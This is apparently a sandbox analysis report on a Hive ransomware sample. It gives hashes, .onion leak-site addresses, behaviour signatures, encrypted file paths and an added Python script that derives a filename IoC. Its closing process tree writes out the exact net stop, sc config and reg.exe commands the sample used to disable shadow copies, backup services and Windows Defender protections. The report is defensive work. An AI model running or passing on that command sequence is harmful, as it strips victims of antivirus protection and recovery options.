Analysis

max time kernel: 136s
max time network: 128s
platform: windows10_x64
resource: win10-en-20211208
submitted: 12-01-2022 14:57

Static task: static1
Behavioral task: behavioral1
Sample: 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe
Resource: win7-en-20211208
General

Target: 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe
Size: 4.0MB
MD5: a5d5890164cb1e203328bee0c2b8cd3f
SHA1: 210ed20a9e07082cae923f5b2426fe44145d48d4
SHA256: 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b
SHA512: 89dca80a954319f0e947c7e9a49081f3a859e8f81c076ae8f4b4902d8f5232b9883e21d150130e6bef27d51b7e03b9c90d87f4157f66d64a1eaeda5b27b0fd7f
Malware Config

Extracted from: C:\Program Files\7-Zip\LdBi_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes: MpCmdRun.exe (PID 3556)

Hive
A ransomware written in Golang first seen in June 2021.

Modifies security service 2 TTPs 1 IoCs
Processes: reg.exe
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" (4 = SERVICE_DISABLED, so the Defender service will not start on the next boot)

Clears Windows event logs 1 TTPs

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes: bcdedit.exe (PID 1628), bcdedit.exe (PID 1592)

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory 64 IoCs
Processes: 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe (every entry below is by this process)
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.Upsell\Default\MSCasualGames.zip
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-20_altform-unplated.png
File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\LdBi_HOW_TO_DECRYPT.txt
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_NAAAADQAAAA0.6ygpf
File opened for modification: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.DATABASECOMPARE.16.1033.hxn.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_LgAAAC4AAAA0.6ygpf
File opened for modification: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\10px.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleMedTile.scale-200.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\ui-strings.js.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Bold.otf.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_CgAAAAoAAAA0.6ygpf
File opened for modification: C:\Program Files\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_CgAAAAoAAAA0.6ygpf
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNotePageLargeTile.scale-200.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\xaml\onenote\ShareErrorMessagePage.xaml
File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\tg_16x11.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Exchange.scale-100.png
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-ppd.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_IAAAACAAAAA0.6ygpf
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Hedge.dxt
File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\sz_60x42.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\eml.scale-32.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui
File opened for modification: C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe\Assets\Office\PlaneCutKeepBottom.scale-140.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionLargeTile.scale-150.png
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-ppd.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_IAAAACAAAAA0.6ygpf
File opened for modification: C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\IEEE2006OfficeOnline.xsl.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_IgAAACIAAAA0.6ygpf
File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\SplashScreen.scale-125.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Grace-ul-oob.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_EgAAABIAAAA0.6ygpf
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons_retina.png.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\ui-strings.js.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_KAAAACgAAAA0.6ygpf
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7813_24x24x32.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarLargeTile.scale-100.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_FAAAABQAAAA0.6ygpf
File opened for modification: C:\Program Files\7-Zip\Lang\tt.txt.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_HgAAAB4AAAA0.6ygpf
File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\ct.sym.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Retail-ul-phn.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN058.XML.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\en-us\oregres.dll.mui.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_NAAAADQAAAA0.6ygpf
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\TEE\fr-FR.PhoneNumber.SMS.model
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionLargeTile.scale-125.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-150.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\ui-strings.js.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\ui-strings.js.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSplashLogo.scale-150.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Generic-Light.scale-400.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\ui-strings.js.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_HAAAABwAAAA0.6ygpf
File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\LdBi_HOW_TO_DECRYPT.txt
File opened for modification: C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\SelectAll.scale-180.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Fues\CheckMark.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-150_contrast-black.png
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsMedTile.contrast-black_scale-100.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_MgAAADIAAAA0.6ygpf
File created: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\LdBi_HOW_TO_DECRYPT.txt
File opened for modification: C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL087.XML.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files\Microsoft Office\root\Office16\PROOF\msgr8es.dub.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\ProjectionCylindric.scale-180.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\DailyChallenges\tile6.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosWideTile.contrast-white_scale-200.png
File opened for modification: C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_IgAAACIAAAA0.6ygpf
File opened for modification: C:\Program Files\Java\jdk1.8.0_66\jre\README.txt.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_JAAAACQAAAA0.6ygpf
File opened for modification: C:\Program Files\SearchTrace.m1v.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf
File opened for modification: C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-36_contrast-high.png
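The file list above is the raw material for a filename IoC, and a practitioner reading it wants two things separated: the ransom notes and the files that actually got the encrypted-name treatment. The following is an added example written for this page, not code from the sandbox or from Hive. The path list is a subset copied from the report (plus the note path from the Malware Config section); the ".6ygpf" extension and the 56-character suffix are what this run produced, and since the report does not say what the suffix encodes, the script only measures it (length, constant versus varying part, decoded byte count) rather than interpreting it.

```python
"""
Classify the paths from a Hive sandbox run into ransom notes, encrypted
files and merely-touched files, and derive a filename IoC from the
encrypted ones. Added example for this page; not code from the report.
SAMPLE_PATHS is a constructed subset of the report's 'Drops file' list.
"""
import base64
import os
import re
from collections import Counter

RANSOM_NOTE = "LdBi_HOW_TO_DECRYPT.txt"      # note name seen in this run
ENCRYPTED_EXT = ".6ygpf"                     # extension seen in this run
# <original name>.<base64url-looking blob>.6ygpf ; the greedy group keeps
# every dot of the original name, the blob itself contains none.
ENCRYPTED_RX = re.compile(
    r"^(?P<orig>.+)\.(?P<blob>[A-Za-z0-9_-]+)" + re.escape(ENCRYPTED_EXT) + r"$")

SAMPLE_PATHS = [  # constructed subset, copied from the report
    r"C:\Program Files\7-Zip\Lang\tt.txt.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_HgAAAB4AAAA0.6ygpf",
    r"C:\Program Files\Java\jdk1.8.0_66\jre\README.txt.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf",
    r"C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul.xrm-ms.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_NAAAADQAAAA0.6ygpf",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Bold.otf.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_CgAAAAoAAAA0.6ygpf",
    r"C:\Program Files\SearchTrace.m1v.xQgaBirKCk_GL1Biqj9SVpJsd-pySfCOQz7anBvDzhr_AAAAAAAAAAA0.6ygpf",
    r"C:\Program Files\7-Zip\LdBi_HOW_TO_DECRYPT.txt",
    r"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\LdBi_HOW_TO_DECRYPT.txt",
    r"C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui",
    r"C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\10px.png",
]


def classify_path(path):
    """Return (kind, details): kind is ransom_note, encrypted or touched."""
    name = path.rsplit("\\", 1)[-1]
    if name == RANSOM_NOTE:
        return "ransom_note", None
    m = ENCRYPTED_RX.match(name)
    if m:
        return "encrypted", m.groupdict()
    return "touched", None


def summarize(paths):
    """Count kinds and measure the suffix without assigning it a meaning."""
    counts, blobs, originals = Counter(), [], []
    for p in paths:
        kind, info = classify_path(p)
        counts[kind] += 1
        if info:
            blobs.append(info["blob"])
            originals.append(info["orig"])
    # Part of the suffix shared by every encrypted file in this run (a
    # per-run constant is worth hunting for; the varying tail is not).
    common = os.path.commonprefix(blobs) if blobs else ""
    decoded_len = {len(base64.urlsafe_b64decode(b + "=" * (-len(b) % 4)))
                   for b in blobs}
    return {"counts": dict(counts), "suffix_len": {len(b) for b in blobs},
            "common_prefix": common, "decoded_len": decoded_len,
            "originals": originals}


def ioc_pattern(paths):
    """Regex for this run's encrypted names: constant part literal, varying
    tail as a fixed-width wildcard, extension anchored at the end."""
    s = summarize(paths)
    if not s["common_prefix"]:
        return None
    tail = max(s["suffix_len"]) - len(s["common_prefix"])
    return re.compile(r"\." + re.escape(s["common_prefix"])
                      + r"[A-Za-z0-9_-]{%d}" % tail
                      + re.escape(ENCRYPTED_EXT) + r"$")


if __name__ == "__main__":
    s = summarize(SAMPLE_PATHS)
    print(s["counts"], "suffix", s["suffix_len"], "bytes", s["decoded_len"])
    print("constant prefix:", s["common_prefix"])
    print("ioc:", ioc_pattern(SAMPLE_PATHS).pattern)
```

On the full list the same split gives 31 encrypted files, 3 ransom notes and 30 files that were opened but kept their name; the 44-character prefix is identical for every encrypted file in the run, so it, not the whole suffix, is the part to carry into a hunt query.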
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (PID 2340)

Modifies registry class 3 IoCs
Processes: reg.exe
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP
(EPP is the Windows Defender "Scan with Microsoft Defender" context-menu shell extension.)

Opens file in notepad (likely ransom note) 1 IoCs
Processes: notepad.exe (PID 4016)

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exe (PID 2288) x3
powershell.exe (PID 4056) x3
05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe (PID 2672) x2
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: wevtutil.exe, wevtutil.exe, wevtutil.exe, wmic.exe, wmic.exe
wevtutil.exe (PID 3852): Token: SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe (PID 644): Token: SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe (PID 864): Token: SeSecurityPrivilege, SeBackupPrivilege
wmic.exe (PID 1352): Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
wmic.exe (PID 3260): Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
wmic.exe (PID 3260), second sequence: Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
Suspicious use of WriteProcessMemory 64 IoCs
Processes: 05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe (PID 2672, written as "sample" below), net.exe x9
Each event appears twice in the report, shown here as "x2".
PID 2672 (sample) wrote to memory of 1188 (net.exe) x2
PID 1188 (net.exe) wrote to memory of 696 (net1.exe) x2
PID 2672 (sample) wrote to memory of 892 (net.exe) x2
PID 892 (net.exe) wrote to memory of 1352 (net1.exe) x2
PID 2672 (sample) wrote to memory of 2220 (net.exe) x2
PID 2220 (net.exe) wrote to memory of 492 (net1.exe) x2
PID 2672 (sample) wrote to memory of 496 (net.exe) x2
PID 496 (net.exe) wrote to memory of 3032 (net1.exe) x2
PID 2672 (sample) wrote to memory of 3296 (net.exe) x2
PID 3296 (net.exe) wrote to memory of 3276 (net1.exe) x2
PID 2672 (sample) wrote to memory of 1512 (net.exe) x2
PID 1512 (net.exe) wrote to memory of 2744 (net1.exe) x2
PID 2672 (sample) wrote to memory of 3336 (net.exe) x2
PID 3336 (net.exe) wrote to memory of 340 (net1.exe) x2
PID 2672 (sample) wrote to memory of 1196 (net.exe) x2
PID 1196 (net.exe) wrote to memory of 1256 (net1.exe) x2
PID 2672 (sample) wrote to memory of 1500 (net.exe) x2
PID 1500 (net.exe) wrote to memory of 1016 (net1.exe) x2
PID 2672 (sample) wrote to memory of 2940 (sc.exe) x2
PID 2672 (sample) wrote to memory of 2876 (sc.exe) x2
PID 2672 (sample) wrote to memory of 1200 (sc.exe) x2
PID 2672 (sample) wrote to memory of 1420 (sc.exe) x2
PID 2672 (sample) wrote to memory of 2364 (sc.exe) x2
PID 2672 (sample) wrote to memory of 4036 (sc.exe) x2
PID 2672 (sample) wrote to memory of 1948 (sc.exe) x2
PID 2672 (sample) wrote to memory of 2172 (sc.exe) x2
PID 2672 (sample) wrote to memory of 2696 (sc.exe) x2
PID 2672 (sample) wrote to memory of 2804 (reg.exe) x2
PID 2672 (sample) wrote to memory of 3124 (reg.exe) x2
PID 2672 (sample) wrote to memory of 2096 (reg.exe) x2
PID 2672 (sample) wrote to memory of 2664 (reg.exe) x2
PID 2672 (sample) wrote to memory of 1388 (reg.exe) x2
Processes

The bracketed number is the depth in the process tree; the first line of each entry is the image path and PID, the second is the command line.

[1] C:\Users\Admin\AppData\Local\Temp\05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe (PID 2672)
    "C:\Users\Admin\AppData\Local\Temp\05ae137c49d99b41296d91667f040082fc33d6f28acbccdc28cfbedf59f6f75b.bin.sample.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SYSTEM32\net.exe (PID 1188)
      net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 696)
        C:\Windows\system32\net1 stop "SamSs" /y
  [2] C:\Windows\SYSTEM32\net.exe (PID 892)
      net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 1352)
        C:\Windows\system32\net1 stop "SDRSVC" /y
  [2] C:\Windows\SYSTEM32\net.exe (PID 2220)
      net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 492)
        C:\Windows\system32\net1 stop "SstpSvc" /y
  [2] C:\Windows\SYSTEM32\net.exe (PID 496)
      net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 3032)
        C:\Windows\system32\net1 stop "UI0Detect" /y
  [2] C:\Windows\SYSTEM32\net.exe (PID 3296)
      net.exe stop "vmicvss" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 3276)
        C:\Windows\system32\net1 stop "vmicvss" /y
  [2] C:\Windows\SYSTEM32\net.exe (PID 1512)
      net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 2744)
        C:\Windows\system32\net1 stop "VSS" /y
  [2] C:\Windows\SYSTEM32\net.exe (PID 3336)
      net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 340)
        C:\Windows\system32\net1 stop "wbengine" /y
  [2] C:\Windows\SYSTEM32\net.exe (PID 1196)
      net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 1256)
        C:\Windows\system32\net1 stop "WebClient" /y
  [2] C:\Windows\SYSTEM32\net.exe (PID 1500)
      net.exe stop "UnistoreSvc_13728" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 1016)
        C:\Windows\system32\net1 stop "UnistoreSvc_13728" /y
  [2] C:\Windows\SYSTEM32\sc.exe (PID 2940)
      sc.exe config "SamSs" start= disabled
  [2] C:\Windows\SYSTEM32\sc.exe (PID 2876)
      sc.exe config "SDRSVC" start= disabled
  [2] C:\Windows\SYSTEM32\sc.exe (PID 1200)
      sc.exe config "SstpSvc" start= disabled
  [2] C:\Windows\SYSTEM32\sc.exe (PID 1420)
      sc.exe config "UI0Detect" start= disabled
  [2] C:\Windows\SYSTEM32\sc.exe (PID 2364)
      sc.exe config "vmicvss" start= disabled
  [2] C:\Windows\SYSTEM32\sc.exe (PID 4036)
      sc.exe config "VSS" start= disabled
  [2] C:\Windows\SYSTEM32\sc.exe (PID 1948)
      sc.exe config "wbengine" start= disabled
  [2] C:\Windows\SYSTEM32\sc.exe (PID 2172)
      sc.exe config "WebClient" start= disabled
  [2] C:\Windows\SYSTEM32\sc.exe (PID 2696)
      sc.exe config "UnistoreSvc_13728" start= disabled
  [2] C:\Windows\SYSTEM32\reg.exe (PID 2804)
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 3124)
      reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 2096)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 2664)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 1388)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 4020)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 3644)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 2024)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SYSTEM32\reg.exe (PID 3048)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
